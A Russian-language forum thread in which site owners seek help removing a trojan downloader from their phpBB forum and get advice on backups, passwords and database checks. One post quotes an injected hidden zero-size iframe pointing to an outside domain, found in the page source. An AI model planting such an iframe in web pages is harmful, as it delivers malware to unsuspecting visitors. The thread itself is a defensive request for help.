Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[serega--909]

Значит поиском по файлам. Что непонятного?По нормальному, надо было бэкап восстановить и не парить никому мозни

А если на сервере нет поиска по файлам, а с моим инетом качать все файлы буду до завтра.
Бэкап к сожалению у меня староват - отсутствуют некоторые моды. Поэтому из него не хотелось бы восстанавливаться. Вот и решил спросить, может кто знает. Ну ладно, буду искать сам(((

[DK7]

в базе еще глянь. Бывает и туда пробирается.

[MAzZY]

У хостера бэкап есть. А вообще, нужно самостоятельно делать бэкапы еженедельно как минимум

[Di_Mok]

Не совсем понял, что это было. Для простоты объяснения скрин:

Безымянный5.jpg

Т.е. окошко Оперы, подобное как при авторизации в прокси, с левым адресом. Ссылочку не даю, т.к. форум не мой и спросить сейчас разрешения не у кого
В поле "Сервер" имя_этого_домена.rxfly.net. Еще было: имя_этого_домена.xp3.biz

Пропало после чистки кэша. В файлах форума никакого криминала не нашёл.

[MIT]

Хостер шалит.

[Di_Mok]

Была такая мысль, стучался в чат к саппорту, но они делали круглые глаза.

[MIT]

Возможно что не хостер форума, а хостер, на чьих серверах лежит реклама, размещаемая на форуме.

[Di_Mok]

Рекламы там нет, но видел подобное на IPB, там было из за подписи http://volgafishing.ru/forum/index.php? ... t&p=585115

[Ildark]

Вот здесь уже описывал это проблему с вирусом (сейчас ветка закрыта) - 2 проблемы: вирус на форуме и не приходят уведомления
Тему Как убить Трояна? изучил вдоль и поперёк. Все рекомендации выполнил, прогнал комп несколькими антивирусами (касперский, аваст, авира)
Проблема не с вирусом не исчезла, но и не постоянная. Т.е. при заходе на форум антивирус может ругнуться и в коде страницы вижу вредоносный код -

Код: Выделить всё

<div id="search-box"><iframe src="http://flicker.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>

Если обновить страницу, то код пропадает.
Вот нарыл онлайн-сервис по проверке сайта на вирусы http://www.error-bank.com/?url=http%3A% ... atishka.ru, тоже то показывает наличие вируса, то говорит что всё ок.
То же самое с яндексом, то всё ок, то обнаруживает вредоносный код.
В файлах шаблонов всё чисто.

[crash]

так а в теме про вирус сложно было сообщение создать?

[Ildark]

В теме Как убить Трояна?
Создать-то несложно, просто вирус у меня какой-то нестандартный, вот и решил отдельную тему сделать.
Если это необходимо, могу скопировать своё сообщение туда, а модераторы удалят эту тему.

[Пчелкин]

Копируйте

[Ildark]

Копируйте

Это пусть кто-нибудь из администрации форума скажет.

[Ildark]

Добавлю деталей:
1. На данном хостинге размещено несколько наших сайтов (в том числе ещё один форум на phpbb 3.0.8), но заражен только один. Если бы был похищен пароль от фтп, то остальные тоже были бы заражены.
2. Вот сегодня Яндекс снова не нашёл на форуме вирусов, хотя я ничего не изменял - ни пароли, ни файлы форума.

[crash]

Это пусть кто-нибудь из администрации форума скажет.

то есть пока в лоб не дадут, хрен поумнею?

Добавлено спустя 1 минуту 46 секунд:
в принципе в теме все описано. Как бороться с вирусом то появляющимся то нет, вам врядли скажут. Может когда яндекс находит вирус. то он на вас обижается просто?

Добавлено спустя 2 минуты 13 секунд:
Ildark
вам вообще надо что-то делать с сайтом. 2 проблемы: вирус на форуме и не приходят уведомления вот еще одна ваша тема и тоже про вирус, а вы плодите все новые темы и связаны с одним и тем же.